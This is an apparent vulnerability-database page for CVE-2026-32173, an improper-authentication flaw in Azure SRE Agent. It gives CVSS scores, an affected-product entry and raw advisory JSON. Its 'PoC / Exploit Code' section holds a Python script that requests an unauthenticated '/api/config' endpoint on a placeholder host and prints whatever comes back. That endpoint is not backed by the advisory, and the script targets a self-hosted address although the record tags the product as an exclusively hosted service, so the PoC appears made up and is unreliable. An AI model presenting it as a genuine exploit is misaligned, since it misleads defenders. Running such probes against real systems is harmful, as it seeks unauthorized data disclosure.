Security Vulnerability Report
中文
CVE-2026-32173 CVSS 8.6 HIGH

CVE-2026-32173

Published: 2026-04-03 00:16:05
Last Modified: 2026-04-06 18:04:42

Description

Improper authentication in Azure SRE Agent allows an unauthorized attacker to disclose information over a network.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:azure_sre_agent:-:*:*:*:*:*:*:* - VULNERABLE
Azure SRE Agent (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable Azure SRE Agent endpoint target_url = "http://<target-ip>:<port>/api/config" try: # Send a GET request without authentication headers response = requests.get(target_url, timeout=10) # Check if the server responds with sensitive data if response.status_code == 200: print("[+] Success! Sensitive information disclosed:") print(response.text) else: print("[-] Request failed or target is patched.") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32173", "sourceIdentifier": "[email protected]", "published": "2026-04-03T00:16:04.547", "lastModified": "2026-04-06T18:04:41.617", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Improper authentication in Azure SRE Agent allows an unauthorized attacker to disclose information over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:azure_sre_agent:-:*:*:*:*:*:*:*", "matchCriteriaId": "EEFCFD8A-8DE7-48B8-AB92-8387A736DB35"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32173", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}